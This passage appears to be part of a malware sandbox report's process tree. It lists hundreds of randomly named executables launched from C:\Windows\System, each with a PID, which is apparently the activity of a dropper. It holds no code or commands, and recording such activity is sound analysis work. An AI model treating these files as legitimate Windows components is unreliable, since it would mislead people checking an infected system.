  C:\Windows\System\TLsPNZq.exe
  2⤵
  PID:8336
- C:\Windows\System\jSaVVRn.exe
  C:\Windows\System\jSaVVRn.exe
  2⤵
  PID:8364
- C:\Windows\System\LHmlrBr.exe
  C:\Windows\System\LHmlrBr.exe
  2⤵
  PID:8392
- C:\Windows\System\PHnccUp.exe
  C:\Windows\System\PHnccUp.exe
  2⤵
  PID:8420
- C:\Windows\System\SeRrbOA.exe
  C:\Windows\System\SeRrbOA.exe
  2⤵
  PID:8448
- C:\Windows\System\unRnMNS.exe
  C:\Windows\System\unRnMNS.exe
  2⤵
  PID:8476
- C:\Windows\System\TPGgmqF.exe
  C:\Windows\System\TPGgmqF.exe
  2⤵
  PID:8504
- C:\Windows\System\qPCDnTU.exe
  C:\Windows\System\qPCDnTU.exe
  2⤵
  PID:8532
- C:\Windows\System\ODAKKlT.exe
  C:\Windows\System\ODAKKlT.exe
  2⤵
  PID:8560
- C:\Windows\System\HrxeGno.exe
  C:\Windows\System\HrxeGno.exe
  2⤵
  PID:8588
- C:\Windows\System\EDYLeCb.exe
  C:\Windows\System\EDYLeCb.exe
  2⤵
  PID:8616
- C:\Windows\System\ACwzrPq.exe
  C:\Windows\System\ACwzrPq.exe
  2⤵
  PID:8644
- C:\Windows\System\mZJhOnu.exe
  C:\Windows\System\mZJhOnu.exe
  2⤵
  PID:8672
- C:\Windows\System\KSLuDGS.exe
  C:\Windows\System\KSLuDGS.exe
  2⤵
  PID:8700
- C:\Windows\System\bVewXyD.exe
  C:\Windows\System\bVewXyD.exe
  2⤵
  PID:8728
- C:\Windows\System\gmRZuUt.exe
  C:\Windows\System\gmRZuUt.exe
  2⤵
  PID:8756
- C:\Windows\System\TBKWrkU.exe
  C:\Windows\System\TBKWrkU.exe
  2⤵
  PID:8784
- C:\Windows\System\huaDzEa.exe
  C:\Windows\System\huaDzEa.exe
  2⤵
  PID:8812
- C:\Windows\System\nEBpLEV.exe
  C:\Windows\System\nEBpLEV.exe
  2⤵
  PID:8840
- C:\Windows\System\PGlaRnT.exe
  C:\Windows\System\PGlaRnT.exe
  2⤵
  PID:8868
- C:\Windows\System\auRbuIJ.exe
  C:\Windows\System\auRbuIJ.exe
  2⤵
  PID:8896
- C:\Windows\System\tottaMH.exe
  C:\Windows\System\tottaMH.exe
  2⤵
  PID:8924
- C:\Windows\System\KmMaTPv.exe
  C:\Windows\System\KmMaTPv.exe
  2⤵
  PID:8952
- C:\Windows\System\GnsNqnU.exe
  C:\Windows\System\GnsNqnU.exe
  2⤵
  PID:8980
- C:\Windows\System\ihZuvjy.exe
  C:\Windows\System\ihZuvjy.exe
  2⤵
  PID:9008
- C:\Windows\System\HDofzaS.exe
  C:\Windows\System\HDofzaS.exe
  2⤵
  PID:9036
- C:\Windows\System\FNvLXNs.exe
  C:\Windows\System\FNvLXNs.exe
  2⤵
  PID:9064
- C:\Windows\System\HcnZCxF.exe
  C:\Windows\System\HcnZCxF.exe
  2⤵
  PID:9092
- C:\Windows\System\zBWAoSE.exe
  C:\Windows\System\zBWAoSE.exe
  2⤵
  PID:9120
- C:\Windows\System\aNxbsYt.exe
  C:\Windows\System\aNxbsYt.exe
  2⤵
  PID:9148
- C:\Windows\System\RknHmfg.exe
  C:\Windows\System\RknHmfg.exe
  2⤵
  PID:9176
- C:\Windows\System\sPuDyBm.exe
  C:\Windows\System\sPuDyBm.exe
  2⤵
  PID:9204
- C:\Windows\System\NkFxHbk.exe
  C:\Windows\System\NkFxHbk.exe
  2⤵
  PID:8220
- C:\Windows\System\rwKRWui.exe
  C:\Windows\System\rwKRWui.exe
  2⤵
  PID:8292
- C:\Windows\System\wrAMfcO.exe
  C:\Windows\System\wrAMfcO.exe
  2⤵
  PID:8356
- C:\Windows\System\PfVwUbW.exe
  C:\Windows\System\PfVwUbW.exe
  2⤵
  PID:8416
- C:\Windows\System\YbPcBvD.exe
  C:\Windows\System\YbPcBvD.exe
  2⤵
  PID:8488
- C:\Windows\System\lfLSrNd.exe
  C:\Windows\System\lfLSrNd.exe
  2⤵
  PID:8548
- C:\Windows\System\sLOPtAL.exe
  C:\Windows\System\sLOPtAL.exe
  2⤵
  PID:8612
- C:\Windows\System\XFUPNdy.exe
  C:\Windows\System\XFUPNdy.exe
  2⤵
  PID:8696
- C:\Windows\System\rnlrKLh.exe
  C:\Windows\System\rnlrKLh.exe
  2⤵
  PID:8780
- C:\Windows\System\NtYYLQX.exe
  C:\Windows\System\NtYYLQX.exe
  2⤵
  PID:8888
- C:\Windows\System\ytcmnNN.exe
  C:\Windows\System\ytcmnNN.exe
  2⤵
  PID:8948
- C:\Windows\System\YOKJvKf.exe
  C:\Windows\System\YOKJvKf.exe
  2⤵
  PID:9060
- C:\Windows\System\CFuAvFe.exe
  C:\Windows\System\CFuAvFe.exe
  2⤵
  PID:9140
- C:\Windows\System\qbGqvxE.exe
  C:\Windows\System\qbGqvxE.exe
  2⤵
  PID:8248
- C:\Windows\System\rnZMMyv.exe
  C:\Windows\System\rnZMMyv.exe
  2⤵
  PID:8332
- C:\Windows\System\ogMOQwF.exe
  C:\Windows\System\ogMOQwF.exe
  2⤵
  PID:8472
- C:\Windows\System\hGRERLM.exe
  C:\Windows\System\hGRERLM.exe
  2⤵
  PID:8852
- C:\Windows\System\klwzwuz.exe
  C:\Windows\System\klwzwuz.exe
  2⤵
  PID:9048
- C:\Windows\System\VhPyZfC.exe
  C:\Windows\System\VhPyZfC.exe
  2⤵
  PID:8272
- C:\Windows\System\KGOlyCQ.exe
  C:\Windows\System\KGOlyCQ.exe
  2⤵
  PID:8404
- C:\Windows\System\iGgkDjF.exe
  C:\Windows\System\iGgkDjF.exe
  2⤵
  PID:8936
- C:\Windows\System\PgImkLD.exe
  C:\Windows\System\PgImkLD.exe
  2⤵
  PID:9244
- C:\Windows\System\mbwDPSY.exe
  C:\Windows\System\mbwDPSY.exe
  2⤵
  PID:9268
- C:\Windows\System\jdckKqa.exe
  C:\Windows\System\jdckKqa.exe
  2⤵
  PID:9312
- C:\Windows\System\JRHEdKV.exe
  C:\Windows\System\JRHEdKV.exe
  2⤵
  PID:9328
- C:\Windows\System\shYlNfw.exe
  C:\Windows\System\shYlNfw.exe
  2⤵
  PID:9368
- C:\Windows\System\KvVYksH.exe
  C:\Windows\System\KvVYksH.exe
  2⤵
  PID:9388
- C:\Windows\System\AeZSEuC.exe
  C:\Windows\System\AeZSEuC.exe
  2⤵
  PID:9404
- C:\Windows\System\HWxSmdy.exe
  C:\Windows\System\HWxSmdy.exe
  2⤵
  PID:9424
- C:\Windows\System\jAomvIP.exe
  C:\Windows\System\jAomvIP.exe
  2⤵
  PID:9452
- C:\Windows\System\hBtSbSX.exe
  C:\Windows\System\hBtSbSX.exe
  2⤵
  PID:9472
- C:\Windows\System\DShrbqR.exe
  C:\Windows\System\DShrbqR.exe
  2⤵
  PID:9516
- C:\Windows\System\KuHYtYA.exe
  C:\Windows\System\KuHYtYA.exe
  2⤵
  PID:9544
- C:\Windows\System\EGJQFgP.exe
  C:\Windows\System\EGJQFgP.exe
  2⤵
  PID:9588
- C:\Windows\System\ybUCObI.exe
  C:\Windows\System\ybUCObI.exe
  2⤵
  PID:9620
- C:\Windows\System\rEfnDiP.exe
  C:\Windows\System\rEfnDiP.exe
  2⤵
  PID:9648
- C:\Windows\System\QeZhcmN.exe
  C:\Windows\System\QeZhcmN.exe
  2⤵
  PID:9676
- C:\Windows\System\AeenIHY.exe
  C:\Windows\System\AeenIHY.exe
  2⤵
  PID:9696
- C:\Windows\System\DRtYcla.exe
  C:\Windows\System\DRtYcla.exe
  2⤵
  PID:9732
- C:\Windows\System\BSHRPPe.exe
  C:\Windows\System\BSHRPPe.exe
  2⤵
  PID:9768
- C:\Windows\System\wJtKzPC.exe
  C:\Windows\System\wJtKzPC.exe
  2⤵
  PID:9788
- C:\Windows\System\dWfxRFP.exe
  C:\Windows\System\dWfxRFP.exe
  2⤵
  PID:9820
- C:\Windows\System\weiibvn.exe
  C:\Windows\System\weiibvn.exe
  2⤵
  PID:9848
- C:\Windows\System\XLeAbzd.exe
  C:\Windows\System\XLeAbzd.exe
  2⤵
  PID:9884
- C:\Windows\System\jMcKvKe.exe
  C:\Windows\System\jMcKvKe.exe
  2⤵
  PID:9912
- C:\Windows\System\ACpeedx.exe
  C:\Windows\System\ACpeedx.exe
  2⤵
  PID:9940
- C:\Windows\System\ERJxprn.exe
  C:\Windows\System\ERJxprn.exe
  2⤵
  PID:9968
- C:\Windows\System\JBpbdgV.exe
  C:\Windows\System\JBpbdgV.exe
  2⤵
  PID:9996
- C:\Windows\System\yvwpVHQ.exe
  C:\Windows\System\yvwpVHQ.exe
  2⤵
  PID:10024
- C:\Windows\System\pOYotOM.exe
  C:\Windows\System\pOYotOM.exe
  2⤵
  PID:10052
- C:\Windows\System\rLYQOxB.exe
  C:\Windows\System\rLYQOxB.exe
  2⤵
  PID:10084
- C:\Windows\System\ExLXpMq.exe
  C:\Windows\System\ExLXpMq.exe
  2⤵
  PID:10112
- C:\Windows\System\AhivdGG.exe
  C:\Windows\System\AhivdGG.exe
  2⤵
  PID:10140
- C:\Windows\System\WsyaIQo.exe
  C:\Windows\System\WsyaIQo.exe
  2⤵
  PID:10168
- C:\Windows\System\fYtDhig.exe
  C:\Windows\System\fYtDhig.exe
  2⤵
  PID:10204
- C:\Windows\System\mEPySWi.exe
  C:\Windows\System\mEPySWi.exe
  2⤵
  PID:10220
- C:\Windows\System\Vaqqztc.exe
  C:\Windows\System\Vaqqztc.exe
  2⤵
  PID:8992
- C:\Windows\System\nNFAfmm.exe
  C:\Windows\System\nNFAfmm.exe
  2⤵
  PID:9320
- C:\Windows\System\YWBDbgL.exe
  C:\Windows\System\YWBDbgL.exe
  2⤵
  PID:9400
- C:\Windows\System\WEsFrQG.exe
  C:\Windows\System\WEsFrQG.exe
  2⤵
  PID:9468
- C:\Windows\System\ZHzUhEQ.exe
  C:\Windows\System\ZHzUhEQ.exe
  2⤵
  PID:9536
- C:\Windows\System\qtxTfgy.exe
  C:\Windows\System\qtxTfgy.exe
  2⤵
  PID:9604
- C:\Windows\System\nAvvKZb.exe
  C:\Windows\System\nAvvKZb.exe
  2⤵
  PID:9664
- C:\Windows\System\YWNwqqH.exe
  C:\Windows\System\YWNwqqH.exe
  2⤵
  PID:9744
- C:\Windows\System\BjkVBTI.exe
  C:\Windows\System\BjkVBTI.exe
  2⤵
  PID:9800
- C:\Windows\System\EtdiPKH.exe
  C:\Windows\System\EtdiPKH.exe
  2⤵
  PID:9872
- C:\Windows\System\yHBjeGT.exe
  C:\Windows\System\yHBjeGT.exe
  2⤵
  PID:9936
- C:\Windows\System\clPzuoz.exe
  C:\Windows\System\clPzuoz.exe
  2⤵
  PID:9980
- C:\Windows\System\kGaDueN.exe
  C:\Windows\System\kGaDueN.exe
  2⤵
  PID:10016
- C:\Windows\System\bXpyRsr.exe
  C:\Windows\System\bXpyRsr.exe
  2⤵
  PID:10048
- C:\Windows\System\EcmKsHZ.exe
  C:\Windows\System\EcmKsHZ.exe
  2⤵
  PID:10132
- C:\Windows\System\zovcrvy.exe
  C:\Windows\System\zovcrvy.exe
  2⤵
  PID:10216
- C:\Windows\System\IFIYiTQ.exe
  C:\Windows\System\IFIYiTQ.exe
  2⤵
  PID:9228
- C:\Windows\System\xmNgVZN.exe
  C:\Windows\System\xmNgVZN.exe
  2⤵
  PID:9500
- C:\Windows\System\qJEUvUg.exe
  C:\Windows\System\qJEUvUg.exe
  2⤵
  PID:9712
- C:\Windows\System\jLIVQir.exe
  C:\Windows\System\jLIVQir.exe
  2⤵
  PID:9828
- C:\Windows\System\cRblSBM.exe
  C:\Windows\System\cRblSBM.exe
  2⤵
  PID:10108
- C:\Windows\System\bWEsWYw.exe
  C:\Windows\System\bWEsWYw.exe
  2⤵
  PID:10192
- C:\Windows\System\PtHNFST.exe
  C:\Windows\System\PtHNFST.exe
  2⤵
  PID:9632
- C:\Windows\System\oRgxTIV.exe
  C:\Windows\System\oRgxTIV.exe
  2⤵
  PID:9776
- C:\Windows\System\vgrpsvm.exe
  C:\Windows\System\vgrpsvm.exe
  2⤵
  PID:9360
- C:\Windows\System\koWKGFK.exe
  C:\Windows\System\koWKGFK.exe
  2⤵
  PID:9432
- C:\Windows\System\kvgSwkm.exe
  C:\Windows\System\kvgSwkm.exe
  2⤵
  PID:10260
- C:\Windows\System\pSueEeq.exe
  C:\Windows\System\pSueEeq.exe
  2⤵
  PID:10284
- C:\Windows\System\kPxVbpq.exe
  C:\Windows\System\kPxVbpq.exe
  2⤵
  PID:10312
- C:\Windows\System\sxOKIpu.exe
  C:\Windows\System\sxOKIpu.exe
  2⤵
  PID:10332
- C:\Windows\System\jBNGuLz.exe
  C:\Windows\System\jBNGuLz.exe
  2⤵
  PID:10372
- C:\Windows\System\QkpHzTv.exe
  C:\Windows\System\QkpHzTv.exe
  2⤵
  PID:10392
- C:\Windows\System\SoSQcSC.exe
  C:\Windows\System\SoSQcSC.exe
  2⤵
  PID:10428
- C:\Windows\System\fRbywLc.exe
  C:\Windows\System\fRbywLc.exe
  2⤵
  PID:10456
- C:\Windows\System\ulUzOdc.exe
  C:\Windows\System\ulUzOdc.exe
  2⤵
  PID:10484
- C:\Windows\System\zxzwKmM.exe
  C:\Windows\System\zxzwKmM.exe
  2⤵
  PID:10500
- C:\Windows\System\ShTdpRo.exe
  C:\Windows\System\ShTdpRo.exe
  2⤵
  PID:10528
- C:\Windows\System\vqlvLUk.exe
  C:\Windows\System\vqlvLUk.exe
  2⤵
  PID:10552
- C:\Windows\System\hWTKqOd.exe
  C:\Windows\System\hWTKqOd.exe
  2⤵
  PID:10596
- C:\Windows\System\NIwiMbz.exe
  C:\Windows\System\NIwiMbz.exe
  2⤵
  PID:10612
- C:\Windows\System\CdLCEhR.exe
  C:\Windows\System\CdLCEhR.exe
  2⤵
  PID:10628
- C:\Windows\System\snxIbVG.exe
  C:\Windows\System\snxIbVG.exe
  2⤵
  PID:10664
- C:\Windows\System\zKwCaBO.exe
  C:\Windows\System\zKwCaBO.exe
  2⤵
  PID:10688
- C:\Windows\System\eMMPMKr.exe
  C:\Windows\System\eMMPMKr.exe
  2⤵
  PID:10712
- C:\Windows\System\cUHylEM.exe
  C:\Windows\System\cUHylEM.exe
  2⤵
  PID:10736
- C:\Windows\System\rGSKktY.exe
  C:\Windows\System\rGSKktY.exe
  2⤵
  PID:10784
- C:\Windows\System\jKRVpRy.exe
  C:\Windows\System\jKRVpRy.exe
  2⤵
  PID:10824
- C:\Windows\System\yxcBfeC.exe
  C:\Windows\System\yxcBfeC.exe
  2⤵
  PID:10852
- C:\Windows\System\fxaQOaT.exe
  C:\Windows\System\fxaQOaT.exe
  2⤵
  PID:10880
- C:\Windows\System\UJPNaoB.exe
  C:\Windows\System\UJPNaoB.exe
  2⤵
  PID:10900
- C:\Windows\System\GOfoRQt.exe
  C:\Windows\System\GOfoRQt.exe
  2⤵
  PID:10924
- C:\Windows\System\igBrBAj.exe
  C:\Windows\System\igBrBAj.exe
  2⤵
  PID:10968
- C:\Windows\System\SpWVMgD.exe
  C:\Windows\System\SpWVMgD.exe
  2⤵
  PID:10984
- C:\Windows\System\djGeIkR.exe
  C:\Windows\System\djGeIkR.exe
  2⤵
  PID:11000
- C:\Windows\System\uNhqcay.exe
  C:\Windows\System\uNhqcay.exe
  2⤵
  PID:11040
- C:\Windows\System\JlRzxIK.exe
  C:\Windows\System\JlRzxIK.exe
  2⤵
  PID:11076
- C:\Windows\System\dQDVWXf.exe
  C:\Windows\System\dQDVWXf.exe
  2⤵
  PID:11108
- C:\Windows\System\JtXZgmZ.exe
  C:\Windows\System\JtXZgmZ.exe
  2⤵
  PID:11136
- C:\Windows\System\IMdZUSO.exe
  C:\Windows\System\IMdZUSO.exe
  2⤵
  PID:11152
- C:\Windows\System\CKScumH.exe
  C:\Windows\System\CKScumH.exe
  2⤵
  PID:11192
- C:\Windows\System\xxtutIk.exe
  C:\Windows\System\xxtutIk.exe
  2⤵
  PID:11208
- C:\Windows\System\tSGdSLm.exe
  C:\Windows\System\tSGdSLm.exe
  2⤵
  PID:11240
- C:\Windows\System\EKSsZos.exe
  C:\Windows\System\EKSsZos.exe
  2⤵
  PID:10256
- C:\Windows\System\cQaUOZC.exe
  C:\Windows\System\cQaUOZC.exe
  2⤵
  PID:10304
- C:\Windows\System\kjsetxA.exe
  C:\Windows\System\kjsetxA.exe
  2⤵
  PID:10380
- C:\Windows\System\ExPpgUd.exe
  C:\Windows\System\ExPpgUd.exe
  2⤵
  PID:10448
- C:\Windows\System\VwaKCTv.exe
  C:\Windows\System\VwaKCTv.exe
  2⤵
  PID:10508
- C:\Windows\System\onSibsx.exe
  C:\Windows\System\onSibsx.exe
  2⤵
  PID:10592
- C:\Windows\System\eXXqGyO.exe
  C:\Windows\System\eXXqGyO.exe
  2⤵
  PID:10672
- C:\Windows\System\BHRWHAj.exe
  C:\Windows\System\BHRWHAj.exe
  2⤵
  PID:10704
- C:\Windows\System\tUjHkol.exe
  C:\Windows\System\tUjHkol.exe
  2⤵
  PID:10780
- C:\Windows\System\OXjUTyW.exe
  C:\Windows\System\OXjUTyW.exe
  2⤵
  PID:10864
- C:\Windows\System\pdJAJpz.exe
  C:\Windows\System\pdJAJpz.exe
  2⤵
  PID:10888
- C:\Windows\System\lJZIyjo.exe
  C:\Windows\System\lJZIyjo.exe
  2⤵
  PID:10960
- C:\Windows\System\isBYagd.exe
  C:\Windows\System\isBYagd.exe
  2⤵
  PID:11028
- C:\Windows\System\KHOsOqT.exe
  C:\Windows\System\KHOsOqT.exe
  2⤵
  PID:11096
- C:\Windows\System\MvBFGtl.exe
  C:\Windows\System\MvBFGtl.exe
  2⤵
  PID:11144
- C:\Windows\System\ccrgvAN.exe
  C:\Windows\System\ccrgvAN.exe
  2⤵
  PID:11204
- C:\Windows\System\YNCFmED.exe
  C:\Windows\System\YNCFmED.exe
  2⤵
  PID:10268
- C:\Windows\System\hhiUBUs.exe
  C:\Windows\System\hhiUBUs.exe
  2⤵
  PID:10444
- C:\Windows\System\NgIqQRF.exe
  C:\Windows\System\NgIqQRF.exe
  2⤵
  PID:10608
- C:\Windows\System\OrYMxfT.exe
  C:\Windows\System\OrYMxfT.exe
  2⤵
  PID:10752
- C:\Windows\System\lmzWOet.exe
  C:\Windows\System\lmzWOet.exe
  2⤵
  PID:10896
- C:\Windows\System\zjoNDYH.exe
  C:\Windows\System\zjoNDYH.exe
  2⤵
  PID:11060
- C:\Windows\System\kKuHRlQ.exe
  C:\Windows\System\kKuHRlQ.exe
  2⤵
  PID:11224
- C:\Windows\System\eCoEZKB.exe
  C:\Windows\System\eCoEZKB.exe
  2⤵
  PID:10520
- C:\Windows\System\PGNDbHm.exe
  C:\Windows\System\PGNDbHm.exe
  2⤵
  PID:9556
- C:\Windows\System\XUPXvIv.exe
  C:\Windows\System\XUPXvIv.exe
  2⤵
  PID:11132
- C:\Windows\System\WtbnuQS.exe
  C:\Windows\System\WtbnuQS.exe
  2⤵
  PID:3520
- C:\Windows\System\AfOCjaQ.exe
  C:\Windows\System\AfOCjaQ.exe
  2⤵
  PID:5044
- C:\Windows\System\kntZfpQ.exe
  C:\Windows\System\kntZfpQ.exe
  2⤵
  PID:11120
- C:\Windows\System\FusPVHH.exe
  C:\Windows\System\FusPVHH.exe
  2⤵
  PID:700
- C:\Windows\System\HuYtbvh.exe
  C:\Windows\System\HuYtbvh.exe
  2⤵
  PID:2740
- C:\Windows\System\cDUkxaL.exe
  C:\Windows\System\cDUkxaL.exe
  2⤵
  PID:4976
- C:\Windows\System\tzTVbxo.exe
  C:\Windows\System\tzTVbxo.exe
  2⤵
  PID:11292
- C:\Windows\System\TApdxgV.exe
  C:\Windows\System\TApdxgV.exe
  2⤵
  PID:11320
- C:\Windows\System\PfGxtpy.exe
  C:\Windows\System\PfGxtpy.exe
  2⤵
  PID:11348
- C:\Windows\System\dfYDMni.exe
  C:\Windows\System\dfYDMni.exe
  2⤵
  PID:11376
- C:\Windows\System\kgvJkJf.exe
  C:\Windows\System\kgvJkJf.exe
  2⤵
  PID:11404
- C:\Windows\System\hdBKGDt.exe
  C:\Windows\System\hdBKGDt.exe
  2⤵
  PID:11432
- C:\Windows\System\galScFM.exe
  C:\Windows\System\galScFM.exe
  2⤵
  PID:11460
- C:\Windows\System\Jvoorrj.exe
  C:\Windows\System\Jvoorrj.exe
  2⤵
  PID:11488
- C:\Windows\System\xgWzTYy.exe
  C:\Windows\System\xgWzTYy.exe
  2⤵
  PID:11520
- C:\Windows\System\CzaTMYC.exe
  C:\Windows\System\CzaTMYC.exe
  2⤵
  PID:11548
- C:\Windows\System\iPcYJnh.exe
  C:\Windows\System\iPcYJnh.exe
  2⤵
  PID:11576
- C:\Windows\System\tzpoTzc.exe
  C:\Windows\System\tzpoTzc.exe
  2⤵
  PID:11604
- C:\Windows\System\iOYBOCV.exe
  C:\Windows\System\iOYBOCV.exe
  2⤵
  PID:11632
- C:\Windows\System\armEPkj.exe
  C:\Windows\System\armEPkj.exe
  2⤵
  PID:11660
- C:\Windows\System\KjNdCbo.exe
  C:\Windows\System\KjNdCbo.exe
  2⤵
  PID:11692
- C:\Windows\System\FstrFeB.exe
  C:\Windows\System\FstrFeB.exe
  2⤵
  PID:11720
- C:\Windows\System\zvyTbGh.exe
  C:\Windows\System\zvyTbGh.exe
  2⤵
  PID:11752
- C:\Windows\System\NPYQDMm.exe
  C:\Windows\System\NPYQDMm.exe
  2⤵
  PID:11780
- C:\Windows\System\SupakXI.exe
  C:\Windows\System\SupakXI.exe
  2⤵
  PID:11808
- C:\Windows\System\mQbppFG.exe
  C:\Windows\System\mQbppFG.exe
  2⤵
  PID:11836
- C:\Windows\System\NxvhfwY.exe
  C:\Windows\System\NxvhfwY.exe
  2⤵
  PID:11864
- C:\Windows\System\dgxRtKU.exe
  C:\Windows\System\dgxRtKU.exe
  2⤵
  PID:11892
- C:\Windows\System\bTzjeRp.exe
  C:\Windows\System\bTzjeRp.exe
  2⤵
  PID:11920
- C:\Windows\System\buWIfuu.exe
  C:\Windows\System\buWIfuu.exe
  2⤵
  PID:11948
- C:\Windows\System\oUPESqR.exe
  C:\Windows\System\oUPESqR.exe
  2⤵
  PID:11976
- C:\Windows\System\qjzmRMc.exe
  C:\Windows\System\qjzmRMc.exe
  2⤵
  PID:12004
- C:\Windows\System\XlUZUth.exe
  C:\Windows\System\XlUZUth.exe
  2⤵
  PID:12032
- C:\Windows\System\JcvYaAU.exe
  C:\Windows\System\JcvYaAU.exe
  2⤵
  PID:12060
- C:\Windows\System\AKxRgWI.exe
  C:\Windows\System\AKxRgWI.exe
  2⤵
  PID:12088
- C:\Windows\System\TgaNNio.exe
  C:\Windows\System\TgaNNio.exe
  2⤵
  PID:12112
- C:\Windows\System\bCgPNab.exe
  C:\Windows\System\bCgPNab.exe
  2⤵
  PID:12136
- C:\Windows\System\aZoPJeJ.exe
  C:\Windows\System\aZoPJeJ.exe
  2⤵
  PID:12168
- C:\Windows\System\RspaYjv.exe
  C:\Windows\System\RspaYjv.exe
  2⤵
  PID:12188
- C:\Windows\System\NBfyOgS.exe
  C:\Windows\System\NBfyOgS.exe
  2⤵
  PID:12212
- C:\Windows\System\nfSPNSw.exe
  C:\Windows\System\nfSPNSw.exe
  2⤵
  PID:12256
- C:\Windows\System\YauKkwv.exe
  C:\Windows\System\YauKkwv.exe
  2⤵
  PID:12276
- C:\Windows\System\NYyjiFk.exe
  C:\Windows\System\NYyjiFk.exe
  2⤵
  PID:11288
- C:\Windows\System\yOhzQqg.exe
  C:\Windows\System\yOhzQqg.exe
  2⤵
  PID:11388
- C:\Windows\System\cBNSokU.exe
  C:\Windows\System\cBNSokU.exe
  2⤵
  PID:11424
- C:\Windows\System\jmoYfrW.exe
  C:\Windows\System\jmoYfrW.exe
  2⤵
  PID:11476
- C:\Windows\System\vDQtwVW.exe
  C:\Windows\System\vDQtwVW.exe
  2⤵
  PID:11560
- C:\Windows\System\atYKUrt.exe
  C:\Windows\System\atYKUrt.exe
  2⤵
  PID:11600
- C:\Windows\System\YPyZfsp.exe
  C:\Windows\System\YPyZfsp.exe
  2⤵
  PID:11652
- C:\Windows\System\eAqfLGY.exe
  C:\Windows\System\eAqfLGY.exe
  2⤵
  PID:11712
- C:\Windows\System\MfNMSVB.exe
  C:\Windows\System\MfNMSVB.exe
  2⤵
  PID:11772
- C:\Windows\System\zwbUkPP.exe
  C:\Windows\System\zwbUkPP.exe
  2⤵
  PID:11828
- C:\Windows\System\pUKqPHZ.exe
  C:\Windows\System\pUKqPHZ.exe
  2⤵
  PID:11876
- C:\Windows\System\OGYAebt.exe
  C:\Windows\System\OGYAebt.exe
  2⤵
  PID:11940
- C:\Windows\System\cmIVmmH.exe
  C:\Windows\System\cmIVmmH.exe
  2⤵
  PID:11996
- C:\Windows\System\djvSroz.exe
  C:\Windows\System\djvSroz.exe
  2⤵
  PID:12072
- C:\Windows\System\WaRkhdp.exe
  C:\Windows\System\WaRkhdp.exe
  2⤵
  PID:12156
- C:\Windows\System\mzjFHbQ.exe
  C:\Windows\System\mzjFHbQ.exe
  2⤵
  PID:12244
- C:\Windows\System\SmYOWYW.exe
  C:\Windows\System\SmYOWYW.exe
  2⤵
  PID:11400
- C:\Windows\System\CXIPkPF.exe
  C:\Windows\System\CXIPkPF.exe
  2⤵
  PID:11484
- C:\Windows\System\GBltNRl.exe
  C:\Windows\System\GBltNRl.exe
  2⤵
  PID:11848
- C:\Windows\System\YPoLjZz.exe
  C:\Windows\System\YPoLjZz.exe
  2⤵
  PID:11972
- C:\Windows\System\jotBEPg.exe
  C:\Windows\System\jotBEPg.exe
  2⤵
  PID:12104
- C:\Windows\System\jpJfezG.exe
  C:\Windows\System\jpJfezG.exe
  2⤵
  PID:12132
- C:\Windows\System\puIOBey.exe
  C:\Windows\System\puIOBey.exe
  2⤵
  PID:12248
- C:\Windows\System\QWfCdYG.exe
  C:\Windows\System\QWfCdYG.exe
  2⤵
  PID:11804
- C:\Windows\System\rIpamti.exe
  C:\Windows\System\rIpamti.exe
  2⤵
  PID:11960
- C:\Windows\System\ZVnJoJH.exe
  C:\Windows\System\ZVnJoJH.exe
  2⤵
  PID:12180
- C:\Windows\System\layPDAd.exe
  C:\Windows\System\layPDAd.exe
  2⤵
  PID:11360
- C:\Windows\System\TPsOBrR.exe
  C:\Windows\System\TPsOBrR.exe
  2⤵
  PID:12308
- C:\Windows\System\uAyhXpc.exe
  C:\Windows\System\uAyhXpc.exe
  2⤵
  PID:12344
- C:\Windows\System\dqQmjAt.exe
  C:\Windows\System\dqQmjAt.exe
  2⤵
  PID:12380
- C:\Windows\System\glASAJF.exe
  C:\Windows\System\glASAJF.exe
  2⤵
  PID:12416
- C:\Windows\System\EylNzpM.exe
  C:\Windows\System\EylNzpM.exe
  2⤵
  PID:12436
- C:\Windows\System\EYBJeFe.exe
  C:\Windows\System\EYBJeFe.exe
  2⤵
  PID:12460
- C:\Windows\System\sIRaFyi.exe
  C:\Windows\System\sIRaFyi.exe
  2⤵
  PID:12480
- C:\Windows\System\gsRyAcF.exe
  C:\Windows\System\gsRyAcF.exe
  2⤵
  PID:12536
- C:\Windows\System\hxqWery.exe
  C:\Windows\System\hxqWery.exe
  2⤵
  PID:12564
- C:\Windows\System\hRakboL.exe
  C:\Windows\System\hRakboL.exe
  2⤵
  PID:12588
- C:\Windows\System\dtunVgu.exe
  C:\Windows\System\dtunVgu.exe
  2⤵
  PID:12612
- C:\Windows\System\dFyLxTB.exe
  C:\Windows\System\dFyLxTB.exe
  2⤵
  PID:12644
- C:\Windows\System\OazJpCG.exe
  C:\Windows\System\OazJpCG.exe
  2⤵
  PID:12664
- C:\Windows\System\IfLuOAR.exe
  C:\Windows\System\IfLuOAR.exe
  2⤵
  PID:12680
- C:\Windows\System\iGxlcre.exe
  C:\Windows\System\iGxlcre.exe
  2⤵
  PID:12704
- C:\Windows\System\rILALtk.exe
  C:\Windows\System\rILALtk.exe
  2⤵
  PID:12748
- C:\Windows\System\QnbjxGP.exe
  C:\Windows\System\QnbjxGP.exe
  2⤵
  PID:12764
- C:\Windows\System\YfJhkJH.exe
  C:\Windows\System\YfJhkJH.exe
  2⤵
  PID:12808
- C:\Windows\System\OuPhjjM.exe
  C:\Windows\System\OuPhjjM.exe
  2⤵
  PID:12828
- C:\Windows\System\uaMgkyA.exe
  C:\Windows\System\uaMgkyA.exe
  2⤵
  PID:12848
- C:\Windows\System\dWVSTsT.exe
  C:\Windows\System\dWVSTsT.exe
  2⤵
  PID:12872
- C:\Windows\System\ndeoAkY.exe
  C:\Windows\System\ndeoAkY.exe
  2⤵
  PID:12896
- C:\Windows\System\xEOBzek.exe
  C:\Windows\System\xEOBzek.exe
  2⤵
  PID:12928
- C:\Windows\System\aCQsvjk.exe
  C:\Windows\System\aCQsvjk.exe
  2⤵
  PID:12972
- C:\Windows\System\AeNsSUp.exe
  C:\Windows\System\AeNsSUp.exe
  2⤵
  PID:13012
- C:\Windows\System\GYBGqEC.exe
  C:\Windows\System\GYBGqEC.exe
  2⤵
  PID:13040
- C:\Windows\System\ajRnoHE.exe
  C:\Windows\System\ajRnoHE.exe
  2⤵
  PID:13056
- C:\Windows\System\mStmRka.exe
  C:\Windows\System\mStmRka.exe
  2⤵
  PID:13076
- C:\Windows\System\ZucXmLb.exe
  C:\Windows\System\ZucXmLb.exe
  2⤵
  PID:13100
- C:\Windows\System\ueNIreT.exe
  C:\Windows\System\ueNIreT.exe
  2⤵
  PID:13120
- C:\Windows\System\ZBbQjAk.exe
  C:\Windows\System\ZBbQjAk.exe
  2⤵
  PID:13152
- C:\Windows\System\ElyDNvr.exe
